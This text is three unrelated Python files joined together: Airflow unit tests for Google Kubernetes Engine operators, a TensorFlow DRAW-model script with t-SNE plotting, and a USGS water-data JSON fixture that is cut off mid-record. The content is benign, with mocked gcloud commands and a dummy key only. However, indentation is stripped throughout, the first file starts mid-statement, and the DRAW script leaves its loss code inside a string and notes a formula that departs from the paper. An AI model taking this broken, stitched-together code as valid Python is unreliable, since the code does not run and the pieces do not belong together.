GKECreateClusterOperator, GKEDeleteClusterOperator, GKEStartPodOperator,
)
TEST_GCP_PROJECT_ID = 'test-id'
PROJECT_LOCATION = 'test-location'
PROJECT_TASK_ID = 'test-task-id'
CLUSTER_NAME = 'test-cluster-name'
PROJECT_BODY = {'name': 'test-name'}
PROJECT_BODY_CREATE_DICT = {'name': 'test-name', 'initial_node_count': 1}
PROJECT_BODY_CREATE_CLUSTER = type(
"Cluster", (object,), {"name": "test-name", "initial_node_count": 1}
)()
TASK_NAME = 'test-task-name'
NAMESPACE = 'default'
IMAGE = 'bash'
GCLOUD_COMMAND = "gcloud container clusters get-credentials {} --zone {} --project {}"
KUBE_ENV_VAR = 'KUBECONFIG'
FILE_NAME = '/tmp/mock_name'
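# For reference, the formatted command the tests below assert on expands to:
#   gcloud container clusters get-credentials test-cluster-name \
#       --zone test-location --project test-id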
class TestGoogleCloudPlatformContainerOperator(unittest.TestCase):
@parameterized.expand(
(body,) for body in [PROJECT_BODY_CREATE_DICT, PROJECT_BODY_CREATE_CLUSTER]
)
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_create_execute(self, body, mock_hook):
operator = GKECreateClusterOperator(project_id=TEST_GCP_PROJECT_ID,
location=PROJECT_LOCATION,
body=body,
task_id=PROJECT_TASK_ID)
operator.execute(None)
mock_hook.return_value.create_cluster.assert_called_once_with(
cluster=body, project_id=TEST_GCP_PROJECT_ID)
@parameterized.expand(
(body,) for body in [
None,
{'missing_name': 'test-name', 'initial_node_count': 1},
{'name': 'test-name', 'missing_initial_node_count': 1},
type('Cluster', (object,), {'missing_name': 'test-name', 'initial_node_count': 1})(),
type('Cluster', (object,), {'name': 'test-name', 'missing_initial_node_count': 1})(),
]
)
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_create_execute_error_body(self, body, mock_hook):
with self.assertRaises(AirflowException):
GKECreateClusterOperator(project_id=TEST_GCP_PROJECT_ID,
location=PROJECT_LOCATION,
body=body,
task_id=PROJECT_TASK_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_create_execute_error_project_id(self, mock_hook):
with self.assertRaises(AirflowException):
GKECreateClusterOperator(location=PROJECT_LOCATION,
body=PROJECT_BODY,
task_id=PROJECT_TASK_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_create_execute_error_location(self, mock_hook):
with self.assertRaises(AirflowException):
GKECreateClusterOperator(project_id=TEST_GCP_PROJECT_ID,
body=PROJECT_BODY,
task_id=PROJECT_TASK_ID)
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_delete_execute(self, mock_hook):
operator = GKEDeleteClusterOperator(project_id=TEST_GCP_PROJECT_ID,
name=CLUSTER_NAME,
location=PROJECT_LOCATION,
task_id=PROJECT_TASK_ID)
operator.execute(None)
mock_hook.return_value.delete_cluster.assert_called_once_with(
name=CLUSTER_NAME, project_id=TEST_GCP_PROJECT_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_delete_execute_error_project_id(self, mock_hook):
with self.assertRaises(AirflowException):
GKEDeleteClusterOperator(location=PROJECT_LOCATION,
name=CLUSTER_NAME,
task_id=PROJECT_TASK_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_delete_execute_error_cluster_name(self, mock_hook):
with self.assertRaises(AirflowException):
GKEDeleteClusterOperator(project_id=TEST_GCP_PROJECT_ID,
location=PROJECT_LOCATION,
task_id=PROJECT_TASK_ID)
# pylint: disable=no-value-for-parameter
@mock.patch('airflow.providers.google.cloud.operators.kubernetes_engine.GKEHook')
def test_delete_execute_error_location(self, mock_hook):
with self.assertRaises(AirflowException):
GKEDeleteClusterOperator(project_id=TEST_GCP_PROJECT_ID,
name=CLUSTER_NAME,
task_id=PROJECT_TASK_ID)
class TestGKEPodOperator(unittest.TestCase):
def setUp(self):
self.gke_op = GKEStartPodOperator(project_id=TEST_GCP_PROJECT_ID,
location=PROJECT_LOCATION,
cluster_name=CLUSTER_NAME,
task_id=PROJECT_TASK_ID,
name=TASK_NAME,
namespace=NAMESPACE,
image=IMAGE)
def test_template_fields(self):
self.assertTrue(set(KubernetesPodOperator.template_fields).issubset(
GKEStartPodOperator.template_fields))
# pylint: disable=unused-argument
@mock.patch(
"airflow.hooks.base_hook.BaseHook.get_connections",
return_value=[Connection(
extra=json.dumps({})
)]
)
@mock.patch(
'airflow.providers.cncf.kubernetes.operators.kubernetes_pod.KubernetesPodOperator.execute')
@mock.patch('tempfile.NamedTemporaryFile')
@mock.patch("subprocess.check_call")
@mock.patch.dict(os.environ, {CREDENTIALS: '/tmp/local-creds'})
def test_execute_conn_id_none(self, proc_mock, file_mock, exec_mock, get_conn):
type(file_mock.return_value.__enter__.return_value).name = PropertyMock(side_effect=[
FILE_NAME
])
def assert_credentials(*args, **kwargs):
            # no key was configured on the connection, so the default
            # credentials env var patched in above should be left untouched
self.assertIn(CREDENTIALS, os.environ)
self.assertEqual(os.environ[CREDENTIALS], '/tmp/local-creds')
proc_mock.side_effect = assert_credentials
self.gke_op.execute(None)
# Assert Environment Variable is being set correctly
self.assertIn(KUBE_ENV_VAR, os.environ)
self.assertEqual(os.environ[KUBE_ENV_VAR], FILE_NAME)
# Assert the gcloud command being called correctly
proc_mock.assert_called_once_with(
GCLOUD_COMMAND.format(CLUSTER_NAME, PROJECT_LOCATION, TEST_GCP_PROJECT_ID).split())
self.assertEqual(self.gke_op.config_file, FILE_NAME)
# pylint: disable=unused-argument
@mock.patch(
"airflow.hooks.base_hook.BaseHook.get_connections",
return_value=[Connection(
extra=json.dumps({
'extra__google_cloud_platform__key_path': '/path/to/file'
})
)]
)
@mock.patch(
'airflow.providers.cncf.kubernetes.operators.kubernetes_pod.KubernetesPodOperator.execute')
@mock.patch('tempfile.NamedTemporaryFile')
@mock.patch("subprocess.check_call")
@mock.patch.dict(os.environ, {})
def test_execute_conn_id_path(self, proc_mock, file_mock, exec_mock, get_con_mock):
type(file_mock.return_value.__enter__.return_value).name = PropertyMock(side_effect=[
FILE_NAME
])
def assert_credentials(*args, **kwargs):
# since we passed in keyfile_path we should get a file
self.assertIn(CREDENTIALS, os.environ)
self.assertEqual(os.environ[CREDENTIALS], '/path/to/file')
proc_mock.side_effect = assert_credentials
self.gke_op.execute(None)
# Assert Environment Variable is being set correctly
self.assertIn(KUBE_ENV_VAR, os.environ)
self.assertEqual(os.environ[KUBE_ENV_VAR], FILE_NAME)
# Assert the gcloud command being called correctly
proc_mock.assert_called_once_with(
GCLOUD_COMMAND.format(CLUSTER_NAME, PROJECT_LOCATION, TEST_GCP_PROJECT_ID).split())
self.assertEqual(self.gke_op.config_file, FILE_NAME)
# pylint: disable=unused-argument
@mock.patch.dict(os.environ, {})
@mock.patch(
"airflow.hooks.base_hook.BaseHook.get_connections",
return_value=[Connection(
extra=json.dumps({
"extra__google_cloud_platform__keyfile_dict": '{"private_key": "r4nd0m_k3y"}'
})
)]
)
@mock.patch(
'airflow.providers.cncf.kubernetes.operators.kubernetes_pod.KubernetesPodOperator.execute')
@mock.patch('tempfile.NamedTemporaryFile')
@mock.patch("subprocess.check_call")
def test_execute_conn_id_dict(self, proc_mock, file_mock, exec_mock, get_con_mock):
type(file_mock.return_value.__enter__.return_value).name = PropertyMock(side_effect=[
FILE_NAME, '/path/to/new-file'
])
def assert_credentials(*args, **kwargs):
# since we passed in keyfile_dict we should get a new file
self.assertIn(CREDENTIALS, os.environ)
self.assertEqual(os.environ[CREDENTIALS], '/path/to/new-file')
proc_mock.side_effect = assert_credentials
self.gke_op.execute(None)
# Assert Environment Variable is being set correctly
self.assertIn(KUBE_ENV_VAR, os.environ)
self.assertEqual(os.environ[KUBE_ENV_VAR], FILE_NAME)
# Assert the gcloud command being called correctly
proc_mock.assert_called_once_with(
GCLOUD_COMMAND.format(CLUSTER_NAME, PROJECT_LOCATION, TEST_GCP_PROJECT_ID).split())
self.assertEqual(self.gke_op.config_file, FILE_NAME)
|
|
#!/usr/bin/env python
""""
Simple implementation of http://arxiv.org/pdf/1502.04623v2.pdf in TensorFlow
Example Usage:
python draw.py --data_dir=/tmp/draw --read_attn=True --write_attn=True
Author: Eric Jang
"""
import tensorflow as tf
from tensorflow.models.rnn.rnn_cell import LSTMCell
import input_data
import numpy as np
import os
import tsne
import numpy as Math
import pylab as Plot
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
tf.flags.DEFINE_string("data_dir", "", "")
tf.flags.DEFINE_boolean("read_attn", True, "enable attention for reader")
tf.flags.DEFINE_boolean("write_attn",True, "enable attention for writer")
FLAGS = tf.flags.FLAGS
## MODEL PARAMETERS ##
data_directory = os.path.join(FLAGS.data_dir, "easy")
if not os.path.exists(data_directory):
os.makedirs(data_directory)
train_data = input_data.read_data_sets(data_directory, one_hot=True).train
A,B = 56,56 # image width,height
img_size = B*A # the canvas size
enc_size = 500 # number of hidden units / output size in LSTM
dec_size = 500
read_n = 12 # read glimpse grid width/height
write_n = 12 # write glimpse grid width/height
read_size = 2*read_n*read_n if FLAGS.read_attn else 2*img_size
rs = np.sqrt(read_size/2).astype(int)
write_size = write_n*write_n if FLAGS.write_attn else img_size
z_size=10 # QSampler output size
T=10 # MNIST generation sequence length
batch_size=train_data._num_examples # training minibatch size
train_iters=10000
learning_rate=1e-3 # learning rate for optimizer
eps=1e-8 # epsilon for numerical stability
## BUILD MODEL ##
DO_SHARE=None # workaround for variable_scope(reuse=True)
x = tf.placeholder(tf.float32,shape=(batch_size,img_size)) # input (batch_size * img_size)
e=tf.random_normal((batch_size,z_size), mean=0, stddev=1) # Qsampler noise
lstm_enc = LSTMCell(enc_size, (rs/4)*(rs/4)*5+dec_size) # encoder Op
lstm_dec = LSTMCell(dec_size, z_size) # decoder Op
phase_train = tf.placeholder(tf.bool, name='phase_train')
def linear(x,output_dim):
"""
affine transformation Wx+b
assumes x.shape = (batch_size, num_features)
"""
w=tf.get_variable("w", [x.get_shape()[1], output_dim])
b=tf.get_variable("b", [output_dim], initializer=tf.constant_initializer(0.0))
return tf.matmul(x,w)+b
from tensorflow.python import control_flow_ops
def batch_norm(x, n_out, phase_train, conv=True, scope='bn'):
"""
Batch normalization on convolutional maps.
Args:
x: Tensor, 4D BHWD input maps
n_out: integer, depth of input maps
        phase_train: boolean tf.Variable, true indicates training phase
        scope: string, variable scope
    Returns:
normed: batch-normalized maps
"""
with tf.variable_scope(scope):
beta = tf.Variable(tf.constant(0.0, shape=[n_out]),
name='beta', trainable=True)
gamma = tf.Variable(tf.constant(1.0, shape=[n_out]),
name='gamma', trainable=True)
if conv:
batch_mean, batch_var = tf.nn.moments(x, [0,1,2], name='moments')
else:
batch_mean, batch_var = tf.nn.moments(x, [0], name='moments')
ema = tf.train.ExponentialMovingAverage(decay=0.5)
def mean_var_with_update():
ema_apply_op = ema.apply([batch_mean, batch_var])
with tf.control_dependencies([ema_apply_op]):
return tf.identity(batch_mean), tf.identity(batch_var)
mean, var = tf.cond(phase_train,
mean_var_with_update,
lambda: (ema.average(batch_mean), ema.average(batch_var)))
normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)
return normed
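# Usage sketch: `phase_train` switches between batch statistics (training) and
# the exponential moving averages kept by `ema` (inference), e.g.
#   y = tf.nn.relu(batch_norm(conv_out, 64, phase_train))
# where conv_out is a hypothetical 4D feature map with 64 channels.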
def filterbank(gx, gy, sigma2,delta, N):
grid_i = tf.reshape(tf.cast(tf.range(N), tf.float32), [1, -1])
mu_x = gx + (grid_i - N / 2 - 0.5) * delta # eq 19
mu_y = gy + (grid_i - N / 2 - 0.5) * delta # eq 20
a = tf.reshape(tf.cast(tf.range(A), tf.float32), [1, 1, -1])
b = tf.reshape(tf.cast(tf.range(B), tf.float32), [1, 1, -1])
mu_x = tf.reshape(mu_x, [-1, N, 1])
mu_y = tf.reshape(mu_y, [-1, N, 1])
sigma2 = tf.reshape(sigma2, [-1, 1, 1])
    Fx = tf.exp(-tf.square((a - mu_x) / (2*sigma2)))  # NB: paper eq 25 has exp(-(a-mu)^2/(2*sigma^2)); here 2*sigma2 sits inside the square
    Fy = tf.exp(-tf.square((b - mu_y) / (2*sigma2)))  # batch x N x B
# normalize, sum over A and B dims
Fx=Fx/tf.maximum(tf.reduce_sum(Fx,2,keep_dims=True),eps)
Fy=Fy/tf.maximum(tf.reduce_sum(Fy,2,keep_dims=True),eps)
return Fx,Fy
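# For reference (cf. DRAW paper, eqs. 25-26): the horizontal filterbank is
#   F_X[i, a] = (1/Z_X) * exp(-(a - mu_x_i)^2 / (2*sigma^2))
# with Z_X chosen so each row sums to 1; F_Y is defined analogously over b,
# which is what the normalization above implements.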
def attn_window(scope,h_dec,N):
with tf.variable_scope(scope,reuse=DO_SHARE):
params=linear(h_dec,5)
gx_,gy_,log_sigma2,log_delta,log_gamma=tf.split(1,5,params)
gx=(A+1)/2*(gx_+1)
gy=(B+1)/2*(gy_+1)
sigma2=tf.exp(log_sigma2)
delta=(max(A,B)-1)/(N-1)*tf.exp(log_delta) # batch x N
return filterbank(gx,gy,sigma2,delta,N)+(tf.exp(log_gamma),)
## READ ##
def read_no_attn(x,x_hat,h_dec_prev):
return tf.concat(1,[x,x_hat])
def read_attn(x,x_hat,h_dec_prev):
Fx,Fy,gamma=attn_window("read",h_dec_prev,read_n)
def filter_img(img,Fx,Fy,gamma,N):
Fxt=tf.transpose(Fx,perm=[0,2,1])
img=tf.reshape(img,[-1,B,A])
glimpse=tf.batch_matmul(Fy,tf.batch_matmul(img,Fxt))
glimpse=tf.reshape(glimpse,[-1,N*N])
return glimpse*tf.reshape(gamma,[-1,1])
x=filter_img(x,Fx,Fy,gamma,read_n) # batch x (read_n*read_n)
x_hat=filter_img(x_hat,Fx,Fy,gamma,read_n)
return tf.concat(1,[x,x_hat]) # concat along feature axis
read = read_attn if FLAGS.read_attn else read_no_attn
## ENCODE ##
def encode(state,r,h_dec):
"""
run LSTM
state = previous encoder state
input = cat(read,h_dec_prev)
returns: (output, new_state)
"""
with tf.variable_scope("encoder",reuse=DO_SHARE):
"""
def lstm_cell(i, o, state):
h = tf.get_variable("h", [batch_size, enc_size])
input_gate = tf.sigmoid(tf.matmul(i, ix) + tf.matmul(o, im) + ib)
forget_gate = tf.sigmoid(tf.matmul(i, fx) + tf.matmul(o, fm) + fb)
tf.get_variable("w", [x.get_shape()[1], output_dim])
update = tf.matmul(i, cx) + tf.matmul(o, cm) + cb
state = forget_gate * state + input_gate * tf.tanh(update)
output_gate = tf.sigmoid(tf.matmul(i, ox) + tf.matmul(o, om) + ob)
return output_gate * tf.tanh(state), state
"""
W1=tf.get_variable("W1", [3, 3, 2, 32*2])
W2=tf.get_variable("W2", [3, 3, 32*2, 64*2])
W3=tf.get_variable("W3", [3, 3, 64*2, 128*2])
W4=tf.get_variable("W4", [1, 1, 128*2, 5])
x=tf.reshape(r, [-1,rs,rs,2])
x=tf.nn.conv2d(x, W1, strides=[1, 2, 2, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 32*2, phase_train))
x=tf.nn.conv2d(x, W2, strides=[1, 1, 1, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 64*2, phase_train))
x=tf.nn.conv2d(x, W3, strides=[1, 2, 2, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 128*2, phase_train))
x=tf.nn.conv2d(x, W4, strides=[1, 1, 1, 1], padding='VALID')
x = tf.nn.relu(batch_norm(x, 5, phase_train))
input=tf.reshape(x, [-1, (rs/4)*(rs/4)*5])
return lstm_enc(tf.concat(1,[input,h_dec]),state)
## Q-SAMPLER (VARIATIONAL AUTOENCODER) ##
def sampleQ(h_enc):
"""
Samples Zt ~ normrnd(mu,sigma) via reparameterization trick for normal dist
mu is (batch,z_size)
"""
with tf.variable_scope("mu",reuse=DO_SHARE):
mu=linear(h_enc,z_size)
with tf.variable_scope("sigma",reuse=DO_SHARE):
logsigma=linear(h_enc,z_size)
sigma=tf.exp(logsigma)
return (mu + sigma*e, mu, logsigma, sigma)
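# Reparameterization trick: z = mu + sigma * eps with eps ~ N(0, I) drawn once
# above as `e`, so sampling stays stochastic while gradients flow through mu
# and sigma.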
## DECODER ##
def decode(state,input):
with tf.variable_scope("decoder",reuse=DO_SHARE):
h_dec, state = lstm_dec(input, state)
W1=tf.get_variable("W1", [3, 3, 128*2, dec_size])
W2=tf.get_variable("W2", [3, 3, 64*2, 128*2])
W3=tf.get_variable("W3", [5, 5, 64*2, 64*2])
W4=tf.get_variable("W4", [5, 5, 32*2, 64*2])
W5=tf.get_variable("W5", [5, 5, 32*2, 32*2])
W6=tf.get_variable("W6", [5, 5, 1, 32*2])
x=tf.reshape(h_dec, [-1,1,1,dec_size])
x=tf.nn.conv2d_transpose(x, W1, [batch_size, 3, 3, 128*2], strides=[1, 1, 1, 1], padding='VALID')
x = tf.nn.relu(batch_norm(x, 128*2, phase_train))
x=tf.nn.conv2d_transpose(x, W2, [batch_size, 6, 6, 64*2], strides=[1, 2, 2, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 64*2, phase_train))
x=tf.nn.conv2d_transpose(x, W3, [batch_size, 12, 12, 64*2], strides=[1, 2, 2, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 64*2, phase_train))
x=tf.nn.conv2d_transpose(x, W4, [batch_size, 12, 12, 32*2], strides=[1, 1, 1, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 32*2, phase_train))
x=tf.nn.conv2d_transpose(x, W5, [batch_size, 12, 12, 32*2], strides=[1, 1, 1, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 32*2, phase_train))
x=tf.nn.conv2d_transpose(x, W6, [batch_size, 12, 12, 1], strides=[1, 1, 1, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 1, phase_train))
return tf.reshape(x, [-1, 12*12]), h_dec, state
## WRITER ##
def write_no_attn(h_dec):
with tf.variable_scope("write",reuse=DO_SHARE):
return linear(h_dec,img_size)
def write_attn(h_dec):
with tf.variable_scope("writeW",reuse=DO_SHARE):
w=linear(h_dec,write_size) # batch x (write_n*write_n)
N=write_n
w=tf.reshape(w,[batch_size,N,N])
Fx,Fy,gamma=attn_window("write",h_dec,write_n)
Fyt=tf.transpose(Fy,perm=[0,2,1])
wr=tf.batch_matmul(Fyt,tf.batch_matmul(w,Fx))
wr=tf.reshape(wr,[batch_size,B*A])
#gamma=tf.tile(gamma,[1,B*A])
return wr*tf.reshape(1.0/gamma,[-1,1])
write=write_attn if FLAGS.write_attn else write_no_attn
## STATE VARIABLES ##
cs=[0]*T # sequence of canvases
z=[0]*T
mus,logsigmas,sigmas=[0]*T,[0]*T,[0]*T # Gaussian params generated by sampleQ; needed later for computing the loss
# initial states
h_dec_prev=tf.zeros((batch_size,dec_size))
enc_state=lstm_enc.zero_state(batch_size, tf.float32)
dec_state=lstm_dec.zero_state(batch_size, tf.float32)
## DRAW MODEL ##
# construct the unrolled computational graph
for t in range(T):
c_prev = tf.zeros((batch_size,img_size)) if t==0 else cs[t-1]
x_hat=x-tf.minimum(tf.nn.relu(c_prev),1) # error image
r=read(x,x_hat,h_dec_prev)
h_enc, enc_state=encode(enc_state,r,h_dec_prev)
#h_en = batch_norm(h_enc, 500, phase_train, conv=False)
z[t],mus[t],logsigmas[t],sigmas[t]=sampleQ(h_enc)
out,h_dec,dec_state=decode(dec_state,z[t])
cs[t]=c_prev+write(out) # store results
h_dec_prev=h_dec
DO_SHARE=True # from now on, share variables
## LOSS FUNCTION ##
"""
def binary_crossentropy(t,o):
return -(t*tf.log(o+eps) + (1.0-t)*tf.log(1.0-o+eps))
# reconstruction term appears to have been collapsed down to a single scalar value (rather than one per item in minibatch)
x_recons=tf.minimum(tf.nn.relu(cs[-1]),1)
# after computing binary cross entropy, sum across features then take the mean of those sums across minibatches
Lx=tf.reduce_sum(binary_crossentropy(x,x_recons),1) # reconstruction term
Lx=tf.reduce_mean(Lx)
kl_terms=[0]*T
for t in range(T):
mu2=tf.square(mus[t])
sigma2=tf.square(sigmas[t])
logsigma=logsigmas[t]
kl_terms[t]=0.5*tf.reduce_sum(mu2+sigma2-2*logsigma,1)-T*.5 # each kl term is (1xminibatch)
KL=tf.add_n(kl_terms) # this is 1xminibatch, corresponding to summing kl_terms from 1:T
Lz=tf.reduce_mean(KL) # average over minibatches
cost=Lx+Lz
## OPTIMIZER ##
optimizer=tf.train.AdamOptimizer(learning_rate, beta1=0.5)
grads=optimizer.compute_gradients(cost)
for i,(g,v) in enumerate(grads):
if g is not None:
grads[i]=(tf.clip_by_norm(g,5),v) # clip gradients
train_op=optimizer.apply_gradients(grads)
"""
## RUN TRAINING ##
# binarized (0-1) mnist data
#fetches=[]
#fetches.extend([Lx,Lz,train_op])
Lxs=[0]*train_iters
Lzs=[0]*train_iters
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.333)
#sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.1)
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))
saver = tf.train.Saver() # saves variables learned during training
#tf.initialize_all_variables().run()
saver.restore(sess, "drawmodel.ckpt") # restore the trained model before generating (comment out to start from scratch)
xtrain=train_data._images # xtrain is (batch_size x img_size)
feed_dict={x:xtrain, phase_train.name: False}
canvases=sess.run(cs,feed_dict)
latent=sess.run(z,feed_dict) # generate some examples
latent=np.array(latent) # T x batch x z_size
latent=latent[1]
print(np.max(latent))
#latent=np.reshape(latent,(T*batch_size,z_size))
Y = tsne.tsne(latent, 2, 50, 5.0)
fig, ax = Plot.subplots()
artists = []
print(Y.shape[0])
print(xtrain.shape[0])
for i, (x0, y0) in enumerate(zip(Y[:,0], Y[:,1])):
image = xtrain[i%xtrain.shape[0]]
image = image.reshape(56,56)
im = OffsetImage(image, zoom=1.0)
ab = AnnotationBbox(im, (x0, y0), xycoords='data', frameon=False)
artists.append(ax.add_artist(ab))
ax.update_datalim(np.column_stack([Y[:,0], Y[:,1]]))
ax.autoscale()
#Plot.scatter(Y[:,0], Y[:,1], 20)
Plot.show()
sess.close()
print('Done drawing! Have a nice day! :)')
|
|
# -*- coding: utf-8 -*-
"""
fixtures_multiple_methods.py
This file contains json from NWIS requests that return multiple methods for a
single parameter. This might occur when there are two sensors of the same type
mounted at different elevations.
This fixture was set up to solve Issue #77.
multi_meth: hf.NWIS(site = '444306122144600', service = 'iv', parameterCd = '63680', start_date = '2020-04-18', end_date = '2020-04-18')
This request is for a site that collects turbidity data (param #63680) using
two different methods: 1 meter deep, and a variable profile.
"""
multi_meth = {
'name': 'ns1:timeSeriesResponseType',
'declaredType': 'org.cuahsi.waterml.TimeSeriesResponseType',
'scope': 'javax.xml.bind.JAXBElement$GlobalScope',
'value': {'queryInfo': {'queryURL': 'http://nwis.waterservices.usgs.gov/nwis/iv/format=json%2C1.1&sites=444306122144600¶meterCd=63680&startDT=2020-04-18&endDT=2020-04-18',
'criteria': {'locationParam': '[ALL:444306122144600]',
'variableParam': '[63680]',
'timeParam': {'beginDateTime': '2020-04-18T00:00:00.000',
'endDateTime': '2020-04-18T23:59:59.000'},
'parameter': []},
'note': [{'value': '[ALL:444306122144600]', 'title': 'filter:sites'},
{'value': '[mode=RANGE, modifiedSince=null] interval={INTERVAL[2020-04-18T00:00:00.000-04:00/2020-04-18T23:59:59.000Z]}',
'title': 'filter:timeRange'},
{'value': 'methodIds=[ALL]', 'title': 'filter:methodId'},
{'value': '2020-11-18T01:54:47.014Z', 'title': 'requestDT'},
{'value': '09460950-2941-11eb-9560-4cd98f8df011', 'title': 'requestId'},
{'value': 'Provisional data are subject to revision. Go to http://waterdata.usgs.gov/nwis/help/?provisional for more information.',
'title': 'disclaimer'},
{'value': 'nadww01', 'title': 'server'}]},
'timeSeries': [{'sourceInfo': {'siteName': 'DETROIT LAKE AT LOG BOOM BEHIND DETROIT DAM, OR',
'siteCode': [{'value': '444306122144600',
'network': 'NWIS',
'agencyCode': 'USGS'}],
'timeZoneInfo': {'defaultTimeZone': {'zoneOffset': '-08:00',
'zoneAbbreviation': 'PST'},
'daylightSavingsTimeZone': {'zoneOffset': '-07:00',
'zoneAbbreviation': 'PDT'},
'siteUsesDaylightSavingsTime': True},
'geoLocation': {'geogLocation': {'srs': 'EPSG:4326',
'latitude': 44.7183194,
'longitude': -122.2461389},
'localSiteXY': []},
'note': [],
'siteType': [],
'siteProperty': [{'value': 'LK', 'name': 'siteTypeCd'},
{'value': '17090005', 'name': 'hucCd'},
{'value': '41', 'name': 'stateCd'},
{'value': '41047', 'name': 'countyCd'}]},
'variable': {'variableCode': [{'value': '63680',
'network': 'NWIS',
'vocabulary': 'NWIS:UnitValues',
'variableID': 51443524,
'default': True}],
'variableName': 'Turbidity, water, unfiltered, monochrome near infra-red LED light, 780-900 nm, detection angle 90 ±2.5°, formazin nephelometric units (FNU)',
'variableDescription': 'Turbidity, water, unfiltered, monochrome near infra-red LED light, 780-900 nm, detection angle 90 +-2.5 degrees, formazin nephelometric units (FNU)',
'valueType': 'Derived Value',
'unit': {'unitCode': 'FNU'},
'options': {'option': [{'name': 'Statistic', 'optionCode': '00000'}]},
'note': [],
'noDataValue': -999999.0,
'variableProperty': [],
'oid': '51443524'},
'values': [{'value': [{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T00:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T00:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T02:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T02:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T03:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T03:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T05:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T05:56:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T06:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T06:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T08:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T08:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T10:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T12:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T12:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T14:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T14:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T15:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T15:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T17:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T17:56:00.000-07:00'},
{'value': '1.3',
'qualifiers': ['P'],
'dateTime': '2020-04-18T18:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T18:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T20:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T20:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T21:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T21:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T23:26:00.000-07:00'},
{'value': '1.3',
'qualifiers': ['P'],
'dateTime': '2020-04-18T23:56:00.000-07:00'}],
'qualifier': [{'qualifierCode': 'P',
'qualifierDescription': 'Provisional data subject to revision.',
'qualifierID': 0,
'network': 'NWIS',
'vocabulary': 'uv_rmk_cd'}],
'qualityControlLevel': [],
'method': [{'methodDescription': '[1 Meter Below The Surface]',
'methodID': 254051}],
'source': [],
'offset': [],
'sample': [],
'censorCode': []},
{'value': [{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:04:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
